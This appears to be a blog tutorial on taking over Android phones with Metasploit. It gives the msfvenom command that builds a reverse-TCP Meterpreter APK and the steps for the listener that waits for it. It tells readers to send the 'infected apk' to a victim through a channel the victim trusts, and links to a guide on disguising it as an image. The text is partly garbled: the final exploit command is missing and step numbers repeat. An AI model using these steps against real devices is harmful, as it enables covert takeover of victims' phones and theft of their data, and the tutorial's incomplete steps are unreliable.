How to hack Android devices with Metasploit tool


Metasploit is a major tool for exploiting many android oriented devices. Metaspoit project is basically designed for finding vulnerabilities and for the purpose of penetration testing.
In this tutorial i will explain the quick exploiting technique with the metasploit tool.
The major aim is , to create a malicious apk through metasploit and sends it through several means to the target or victim.

Fire up your kali linux and download the metasploi framework available in github .
After this, unpack the metasploit with

msfconsole command

Step 1:

Start creating the malicious apk with msfvenom. This part of the framework creates the malicious apk with the tcp protocol through which we enters the meterpreter session.Meterpreter is the indication for the starting of the exploit. If the meterpreter session is displayed on the terminal then, it indicates that the exploit is successfull. In place of lhost=[IP], the IP indicates the ip address of the attacker or the host machine. Set the local port to 4444 through which the explot can be listened. Name the apk at the end of the command as your wish.

./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk

This command will create the apk at the mentioned location.

Step 2:
Setup the reverse payload with the command

set payload android/meterpreter/reverse_tcp

Step 3:

Set up the listener for the exploitation purpose with the apk.

use exploit/multi/handler

This command sets the payload through which you can listen the data from the android device after exploitation. reverse_tcp explains the tcp-tcp communication .

Step 3:
Set the local host with the command
set LHOST [ip]

Thats it, you are done with the setup process. Now you should send the infected apk through any means so that they can install them and open it once. So, you are mode of sending must be legitimate that they can believe you and install them.

After sending the apk,start exploiting with the command


If the console displays the meterpreter session ,then your exploit is successful. You can view the data in the android device with the help command.

you can also send those apk in the form of images….Read more here

How to bind an Image with APK file

Happy hacking 🙂


Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.